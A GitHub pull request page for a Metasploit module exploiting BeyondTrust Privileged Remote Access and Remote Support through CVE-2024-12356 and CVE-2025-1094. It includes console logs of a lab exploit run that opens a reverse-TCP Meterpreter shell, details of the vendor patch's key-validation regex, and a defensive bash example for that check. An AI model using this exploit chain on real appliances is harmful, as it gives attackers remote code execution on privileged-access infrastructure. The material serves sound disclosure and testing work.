
Exploit module for BeyondTrust Privileged Remote Access & Remote Support (CVE-2024-12356, CVE-2025-1094) #19877

Merged
merged 19 commits into from
Feb 17, 2025

Conversation

sfewer-r7
Contributor

@sfewer-r7 sfewer-r7 commented Feb 13, 2025

Overview

This pull request adds an unauthenticated RCE exploit module targeting BeyondTrust Privileged Remote Access & Remote Support, leveraging CVE-2024-12356 + CVE-2025-1094.

CVE-2024-12356 is an argument injection issue in the BeyondTrust code base, and CVE-2025-1094 is a SQL injection issue in the PostgreSQL code base (shipped as a component in the BeyondTrust appliance).

The exploit can either leverage CVE-2024-12356 and CVE-2025-1094 together, or solely leverage CVE-2025-1094 (this is the default) for RCE. Arbitrary code execution is achieved with the privileges of the current site user (i.e. not root).

For a full technical analysis of the vulnerabilities, please read our AttackerKB Rapid7 Analysis.

Example

msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > check
[*] 192.168.86.105:443 - The target appears to be vulnerable. Detected version 24.1.2
msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected version 24.1.2
[*] Using company name: mytestcompany
[*] Sending stage (3045380 bytes) to 192.168.86.105
[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.105:10104) at 2025-01-31 10:51:38 +0000

meterpreter > getuid
Server username: mytestcompany
meterpreter > sysinfo
Computer     : 192.168.86.105
OS           : Gentoo 2.14 (Linux 6.1.76-bt)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@smcintyre-r7 smcintyre-r7 added the module, rn-modules (release notes for new or majorly enhanced modules) and hotness (something we're really excited about) labels Feb 14, 2025
…ndocumented API endpoint to discover the target site company name.
@msutovsky-r7 msutovsky-r7 self-assigned this Feb 14, 2025
@sfewer-r7
Contributor Author

Adding a comment here to mention that this module relies on #19834 (to fix an issue with WebSockets), so dropping the module into an older version of the framework won't work; you need to run MSF that has the WebSocket bug fix in it (MSF 6.4.47 and above).

@sfewer-r7
Contributor Author

I added commit 6f1287d, to warn a user if the exploit detects the WebSocket connection having been closed unexpectedly, as this is a strong indication the target has the patch BT24-10-ONPREM1 applied. As we cannot detect a patched target by a version-based check (the patch does not update the product's version number), this is a good way to help a user understand why exploitation may have failed.

For example, running against a patched target now gives this:

msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected version 24.1.2
[*] Using company name: mytestcompany
[!] WebSocket closed unexpectedly! This may indicate the patch BT24-10-ONPREM1 has been applied, and the target is no longer vulnerable.
[*] Exploit completed, but no session was created.

This works because the patch BT24-10-ONPREM1 adds the below regex to sanity-check the malicious gskey, and then calls exit 1, terminating the thin-scc-wrapper script early, which in turn tears down the WebSocket connection.

+	elif [[ ! "$gskey" =~ ^[a-zA-Z0-9]{32}$ ]]; then
+		blog "bad session key given: [$gskey]"
+		exit 1
 	else
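Review bot: the `blog "bad session key given: [$gskey]"` line in the new `elif` branch writes the rejected value verbatim, and at that point `$gskey` is known to be attacker-controlled (it has just failed the regex), so any newline or terminal escape sequence in it goes straight into the log; consider logging only its length, or a printable-filtered and length-capped copy. The `^[a-zA-Z0-9]{32}$` check itself is sound: it is anchored at both ends and the class admits none of the whitespace or punctuation an argument injection needs, which is why a malformed key now exits the wrapper before it proceeds.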
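To make the effect of that gate concrete, here is an added, stand-alone example (not code from this PR, from Metasploit, or from the BT24-10-ONPREM1 patch) that reproduces the key check and pairs it with a log-sanitising helper, so a rejected key can be recorded without carrying control characters into the log. It assumes the key arrives as a single shell string, as `"$gskey"` does in thin-scc-wrapper.

```shell
#!/usr/bin/env bash
# Added example: a stand-alone version of the session-key gate the patch
# introduces, so the behaviour of ^[a-zA-Z0-9]{32}$ can be exercised
# without the appliance. Assumption: the key is passed as one shell string.

# Returns 0 when the key is exactly 32 ASCII letters/digits, 1 otherwise.
# Both anchors matter: without them a valid 32-char run embedded in a longer
# string (e.g. one carrying extra arguments) would still pass.
validate_gskey() {
    local gskey="$1"
    [[ "$gskey" =~ ^[a-zA-Z0-9]{32}$ ]]
}

# Reduces an untrusted value to printable ASCII and a fixed maximum length
# before it is written to a log line, so a rejected key cannot smuggle
# newlines or terminal escape sequences into the log.
safe_log_value() {
    local raw="$1"
    printf '%s' "$raw" | LC_ALL=C tr -cd '[:print:]' | cut -c1-64
}

# Mirrors the patch's control flow: reject and stop early on a bad key.
# Prints the log line it would emit; returns 1 on rejection, 0 on acceptance.
check_session_key() {
    local gskey="$1"
    if ! validate_gskey "$gskey"; then
        printf 'bad session key given: [%s]\n' "$(safe_log_value "$gskey")"
        return 1
    fi
    printf 'session key accepted\n'
    return 0
}
```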

…ll check for the same thing as part of its matching expression. Thanks msutovsky-r7 for spotting this.
@msutovsky-r7 msutovsky-r7 merged commit 05c9550 into rapid7:master Feb 17, 2025
28 checks passed
@msutovsky-r7
Contributor

Release Notes

The module exploits two bugs, CVE-2024-12356 and CVE-2025-1094, an argument injection in the BeyondTrust code base and a SQL injection in the PostgreSQL code base, respectively.
